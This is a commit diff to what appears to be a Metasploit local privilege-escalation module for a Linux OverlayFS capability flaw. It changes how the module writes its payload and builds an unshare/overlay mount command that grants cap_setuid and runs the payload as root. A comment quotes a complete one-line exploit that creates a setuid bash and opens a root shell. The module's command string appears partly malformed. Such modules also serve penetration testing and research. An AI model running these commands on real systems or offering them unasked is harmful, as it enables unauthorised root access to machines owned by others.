remove upload_dir opt

Author: Corey

modules/exploits/linux/local/game_overlay_privesc.rb

@@ -51,9 +51,6 @@ def initialize(info = {})
     register_options [
       OptString.new('PayloadFilename', [true, 'Name of payload file', 'marv.elf'])
     ]
-    register_advanced_options [
-      OptString.new('UploadDir', [true, 'Directory where the payload will be uploaded to.', '/tmp'])
-    ]
   end
 
   def vuln
@@ -110,29 +107,21 @@ def exploit
     # So we can run a shell without having to drop a new executable
     print_status "Running exploit..."
 
-    dir = datastore['UploadDir'].to_s
-
-    Failure::BadConfig("Upload dir is not writeable") unless writable?(dir)
-
-    payload_dir = "#{dir}/.#{rand_text_alphanumeric(4..20)}/"
-
-    # make sure dir doesn't already exist
-    Failure::BadConfig("#{payload_dir} already exists") if directory_exist? payload_dir
-
-    mkdir payload_dir
-    register_dir_for_cleanup payload_dir
-
-    payload_file = payload_dir + datastore['PayloadFilename']
+    payload_file = datastore['PayloadFilename']
     register_file_for_cleanup payload
 
     # Write payload file
-    write_file 'test.txt', 'Hello, World !'
-   # write_file payload, generate_payload.generate
+    print_status "payload_file: #{payload_file}"
+
+    Failure::BadConfig "#{payload_file} already exists" if file? payload_file
+    Failure::BadConfig "Current directory isn't writeable" unless writable? '.' 
+
+    write_file payload_file, generate_payload.generate
 
     # run shell in a different namespace, add setuid capabilities and create a new mount point 
     # Based on g1vi exploit: "unshare -rm sh -c \"mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;\" && u/python3 -c 'import os;os.setuid(0);os.system(\"cp /bin/bash /var/tmp/bash && chmod 4755 /var/tmp/bash && /var/tmp/bash -p && rm -rf l m u w /var/tmp/bash\")'" 
-    hack = "unshare -rm sh -c \"mkdir l u w m && cp #{payload} l/; setcap cap_setuid+eip l/#{payload}; mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; && chmod 4755 /u/#{payload} && /u/#{payload}" # && rm -rf l/ m/ u/ w/ #{payload} }
-    print_status("Running exploit #{hack}")
+    hack = "unshare -rm sh -c \"mkdir l u w m && cp #{payload_file} l/; setcap cap_setuid+eip l/#{payload_file}; mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; && chmod 4755 /u/#{payload_file} && /u/#{payload_file}" # && rm -rf l/ m/ u/ w/ #{payload} }
+    print_status("Running exploit '#{hack}'")
     cmd_exec hack
   end